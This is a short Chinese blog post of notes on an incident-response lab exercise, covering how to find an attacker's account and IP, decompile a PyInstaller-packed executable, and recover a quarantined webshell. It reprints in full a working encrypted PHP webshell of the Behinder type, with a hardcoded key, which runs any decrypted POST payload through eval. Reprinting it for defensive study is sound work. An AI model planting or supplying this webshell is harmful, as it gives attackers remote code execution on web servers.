【Web1】靶机应急响应

katniss688

已于 2024-06-26 23:03:19 修改

阅读量130

点赞数 1

文章标签：安全

于 2024-06-26 22:56:49 首次发布

本文链接：https://blog.csdn.net/katniss688/article/details/140000428

版权

个人觉得这篇讲得非常详细https://blog.csdn.net/W13680336969/article/details/137295391

web1比web2简单了很多。。。
主要知识点：1、查找攻击者用户名以及ip地址。
2、发现是用 pyinstaller 打包的 exe 文件，利用 pyinstxtractor 进行反编译（是怎么发现用pyinstaller打包的我不知道）
python .\pyinstxtractor.py .\Kuang.exe得到可以看的pyc文件。
3、shell可以用D盾检测目录，也可以读log文件找到。不过刚找到就被靶机自带的windows defence查杀了，那你早干嘛去了呢。。。要找到windows安全中心中的保护历史记录再恢复。。。

以上。这篇还是很简单的。

这里再次把shell.php内容贴入便于查看。

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

katniss688

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
【Web1】靶机应急响应

3、shell可以用D盾检测目录，也可以读log文件找到。不过刚找到就被靶机自带的windows defence查杀了，那你早干嘛去了呢。要找到windows安全中心中的保护历史记录再恢复。2、发现是用 pyinstaller 打包的 exe 文件，利用 pyinstxtractor 进行反编译（是怎么发现用pyinstaller打包的我不知道）python .\pyinstxtractor.py .\Kuang.exe得到可以看的pyc文件。web1比web2简单了很多。
复制链接

扫一扫